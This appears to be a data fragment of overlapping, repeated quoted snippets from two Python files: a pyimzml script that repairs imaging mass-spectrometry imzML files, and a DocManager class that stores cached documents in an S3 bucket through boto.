--\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as", "imzML and ibd files imzml_file = 'image_data_file.imzML' # Provide imzML data file name", "imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p", "from pyimzml.ImzMLParser import ImzMLParser from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import", "imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p =", "directory with imzML and ibd files imzml_file = 'image_data_file.imzML' # Provide imzML data", "desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError:", "pyimzml.ImzMLParser import ImzMLParser from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import os", "pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import os from tqdm import tqdm", "and ibd files imzml_file = 'image_data_file.imzML' # Provide imzML data file name imzML_fix(data_path,", "import ImzMLWriter import numpy as np import os from tqdm import tqdm ##", "## SCRIPT 1B: Run this script if SCRIPT 1A encounters a ValueError. def", "np import os from tqdm import tqdm ## SCRIPT 1B: Run this script", "Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'),", "polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs,", "Run this script if SCRIPT 1A encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'):", "# Provide path to data directory with imzML and ibd files imzml_file =", "numpy as np import os from tqdm import tqdm ## SCRIPT 1B: Run", "os from tqdm import tqdm ## SCRIPT 1B: Run this script if SCRIPT", "'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with imzML and ibd files imzml_file", "1A encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('--", "writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path =", "SCRIPT 1A encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file)", "print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path,", "Provide path to data directory with imzML and ibd files imzml_file = 'image_data_file.imzML'", "if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory", "from tqdm import tqdm ## SCRIPT 1B: Run this script if SCRIPT 1A", "path to data directory with imzML and ibd files imzml_file = 'image_data_file.imzML' #", "__name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with", "tqdm ## SCRIPT 1B: Run this script if SCRIPT 1A encounters a ValueError.", "idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs,", "ImzMLWriter import numpy as np import os from tqdm import tqdm ## SCRIPT", "writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to", "f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try:", "np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data", "intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data'", "ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path", "for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx)", "from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import os from tqdm import", "1B: Run this script if SCRIPT 1A encounters a ValueError. def imzML_fix(data_path, imzml_file,", "SCRIPT 1B: Run this script if SCRIPT 1A encounters a ValueError. def imzML_fix(data_path,", "p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path", "data directory with imzML and ibd files imzml_file = 'image_data_file.imzML' # Provide imzML", "imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str)", "to data directory with imzML and ibd files imzml_file = 'image_data_file.imzML' # Provide", "except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide", "MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0),", "ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')):", "tqdm import tqdm ## SCRIPT 1B: Run this script if SCRIPT 1A encounters", "ibd files imzml_file = 'image_data_file.imzML' # Provide imzML data file name imzML_fix(data_path, imzml_file)", "== '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with imzML", "<reponame>luketrichardson/RKMD-MS-Imaging-Annotation-and-Filtering from pyimzml.ImzMLParser import ImzMLParser from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np", "with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS", "polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path)", "p = ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for", "try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if", "data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0))", "ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords", "= p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__':", "coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities," ]
[ "return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not", "boto.s3.key import Key from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from", ".doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents", "operations on documents \"\"\" def __init__(self): \"\"\" Instantiates a new instance of DocManager", "new instance of DocManager class 'bucketConnString' : connection string of s3 bucket in", "import json import calendar import time from boto.s3.connection import S3Connection from boto.s3.key import", "boto.s3.connection import S3Connection from boto.s3.key import Key from .cachingHelper import getCache from .constants", "\"\"\" Manage documents stored in cloud. Contains functions for CRUD operations on documents", "allowed there is only 2kb. tags = dict(doc.tags) tags['content'] = doc.content keyContents =", "keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags return", "in cloud. Contains functions for CRUD operations on documents \"\"\" def __init__(self): \"\"\"", "Contains functions for CRUD operations on documents \"\"\" def __init__(self): \"\"\" Instantiates a", "is only 2kb. tags = dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents)", "maximum size # allowed there is only 2kb. tags = dict(doc.tags) tags['content'] =", "docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def", "which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900", "keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None)", "bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit):", "parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified)", "directly in blob's metadata as the maximum size # allowed there is only", "S3Connection from boto.s3.key import Key from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME,", "k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content", "= os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn", "import calendar import time from boto.s3.connection import S3Connection from boto.s3.key import Key from", "docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content',", "= Key(self.__getBucket()) k.key = doc.key # not storing tags directly in blob's metadata", "from boto.s3.connection import S3Connection from boto.s3.key import Key from .cachingHelper import getCache from", "cloud. Contains functions for CRUD operations on documents \"\"\" def __init__(self): \"\"\" Instantiates", "Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents)", "= json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags return Doc(docKey, content, tags)", "self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self,", "if not keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey,", "as the maximum size # allowed there is only 2kb. tags = dict(doc.tags)", "tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey):", "calendar import time from boto.s3.connection import S3Connection from boto.s3.key import Key from .cachingHelper", "storing tags directly in blob's metadata as the maximum size # allowed there", "DocManager: \"\"\" Manage documents stored in cloud. Contains functions for CRUD operations on", "class 'bucketConnString' : connection string of s3 bucket in which docs are stored.", "Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in", "= self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def", "DocManager class 'bucketConnString' : connection string of s3 bucket in which docs are", "< timeLimit: return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\", "(FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key = doc.key", "keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry)", "content, tags) def delete(self, docKey): k = Key(self.__getBucket()) k.key = docKey k.delete() self.cache.delete(docKey)", "parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager:", "def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name)", "= dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def", "not in doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key = doc.key #", "LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t):", "def get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key", "import S3Connection from boto.s3.key import Key from .cachingHelper import getCache from .constants import", "keyContents = self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents", "for CRUD operations on documents \"\"\" def __init__(self): \"\"\" Instantiates a new instance", "only 2kb. tags = dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key,", "= getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit:", "Manage documents stored in cloud. Contains functions for CRUD operations on documents \"\"\"", "\\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key =", "= storedTags return Doc(docKey, content, tags) def delete(self, docKey): k = Key(self.__getBucket()) k.key", "k.key = doc.key # not storing tags directly in blob's metadata as the", "return Doc(docKey, content, tags) def delete(self, docKey): k = Key(self.__getBucket()) k.key = docKey", "\"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in cloud. Contains functions for CRUD", "k = Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags", "def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self,", "content = storedTags.pop('content', None) tags = storedTags return Doc(docKey, content, tags) def delete(self,", "getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return", "keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey)", "timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k = Key(self.__getBucket())", "import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from", "def put(self, doc): k = Key(self.__getBucket()) k.key = doc.key # not storing tags", "from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage", "= getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return", "from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString,", "self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags", "key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME]", "s3 bucket in which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache =", "conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc", "validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc =", ": connection string of s3 bucket in which docs are stored. \"\"\" self.bucketConnString", "getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'],", "connection string of s3 bucket in which docs are stored. \"\"\" self.bucketConnString =", "doc.key # not storing tags directly in blob's metadata as the maximum size", "= Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags =", "= k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags", "blob's metadata as the maximum size # allowed there is only 2kb. tags", "return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in cloud. Contains functions", "tags = storedTags return Doc(docKey, content, tags) def delete(self, docKey): k = Key(self.__getBucket())", "__init__(self): \"\"\" Instantiates a new instance of DocManager class 'bucketConnString' : connection string", "k = Key(self.__getBucket()) k.key = doc.key # not storing tags directly in blob's", "instance of DocManager class 'bucketConnString' : connection string of s3 bucket in which", "__getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key,", "of DocManager class 'bucketConnString' : connection string of s3 bucket in which docs", "None) tags = storedTags return Doc(docKey, content, tags) def delete(self, docKey): k =", "bucket in which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache()", "from .dbhelper import parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19],", "self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string()", "storedTags.pop('content', None) tags = storedTags return Doc(docKey, content, tags) def delete(self, docKey): k", "not storing tags directly in blob's metadata as the maximum size # allowed", "CRUD operations on documents \"\"\" def __init__(self): \"\"\" Instantiates a new instance of", "import parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class", "# allowed there is only 2kb. tags = dict(doc.tags) tags['content'] = doc.content keyContents", "self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents: k", "storedTags return Doc(docKey, content, tags) def delete(self, docKey): k = Key(self.__getBucket()) k.key =", "doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags)", "= doc.key # not storing tags directly in blob's metadata as the maximum", "> timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k =", "getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc", "get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key =", "conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) <", "(doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k", "documents stored in cloud. Contains functions for CRUD operations on documents \"\"\" def", ".constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc import Doc", "import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored", "and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key", "_getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in cloud. Contains", "False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in", "keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents: k =", "= docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content =", "'bucketConnString' : connection string of s3 bucket in which docs are stored. \"\"\"", "metadata as the maximum size # allowed there is only 2kb. tags =", "import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc import Doc def", "class DocManager: \"\"\" Manage documents stored in cloud. Contains functions for CRUD operations", "the maximum size # allowed there is only 2kb. tags = dict(doc.tags) tags['content']", "Key(self.__getBucket()) k.key = doc.key # not storing tags directly in blob's metadata as", "functions for CRUD operations on documents \"\"\" def __init__(self): \"\"\" Instantiates a new", ".cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection", "from boto.s3.key import Key from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER", "# not storing tags directly in blob's metadata as the maximum size #", "if _getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit)", "\"\"\" Instantiates a new instance of DocManager class 'bucketConnString' : connection string of", "json import calendar import time from boto.s3.connection import S3Connection from boto.s3.key import Key", "= self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents =", "FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t): return", "time from boto.s3.connection import S3Connection from boto.s3.key import Key from .cachingHelper import getCache", "documents \"\"\" def __init__(self): \"\"\" Instantiates a new instance of DocManager class 'bucketConnString'", "def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in cloud.", "timeLimit: return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER", "tags directly in blob's metadata as the maximum size # allowed there is", "stored in cloud. Contains functions for CRUD operations on documents \"\"\" def __init__(self):", "getS3Connection from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\"", "string of s3 bucket in which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING']", "self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString)", "os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn =", "= parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if", "os import json import calendar import time from boto.s3.connection import S3Connection from boto.s3.key", "calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in cloud. Contains functions for", "self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags return Doc(docKey,", "self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString)", "2kb. tags = dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents,", "return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False", "= storedTags.pop('content', None) tags = storedTags return Doc(docKey, content, tags) def delete(self, docKey):", "import Key from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper", "of s3 bucket in which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache", "dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self,", "stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams", "\"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams =", "900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def", "return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc):", "on documents \"\"\" def __init__(self): \"\"\" Instantiates a new instance of DocManager class", "import time from boto.s3.connection import S3Connection from boto.s3.key import Key from .cachingHelper import", "in which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry=", "k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags =", "in doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key = doc.key # not", "in blob's metadata as the maximum size # allowed there is only 2kb.", "self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket())", "docKey): keyContents = self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key = docKey", "json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if not", "import os import json import calendar import time from boto.s3.connection import S3Connection from", "timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] >", "Instantiates a new instance of DocManager class 'bucketConnString' : connection string of s3", "put(self, doc): k = Key(self.__getBucket()) k.key = doc.key # not storing tags directly", "k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents:", "a new instance of DocManager class 'bucketConnString' : connection string of s3 bucket", "self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False)", "Key from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import", "__isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name) return", "doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents =", ".dbhelper import parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\"))", "= json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if", "_getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and", "are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self):", "there is only 2kb. tags = dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags)", "from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc import", "doc): k = Key(self.__getBucket()) k.key = doc.key # not storing tags directly in", "Doc(docKey, content, tags) def delete(self, docKey): k = Key(self.__getBucket()) k.key = docKey k.delete()", "storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags return Doc(docKey, content,", "not keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents,", "\"\"\" def __init__(self): \"\"\" Instantiates a new instance of DocManager class 'bucketConnString' :", "doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key = doc.key # not storing", "def __init__(self): \"\"\" Instantiates a new instance of DocManager class 'bucketConnString' : connection", "size # allowed there is only 2kb. tags = dict(doc.tags) tags['content'] = doc.content", "tags = dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry)", "json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags return Doc(docKey, content, tags) def", "= doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents" ]
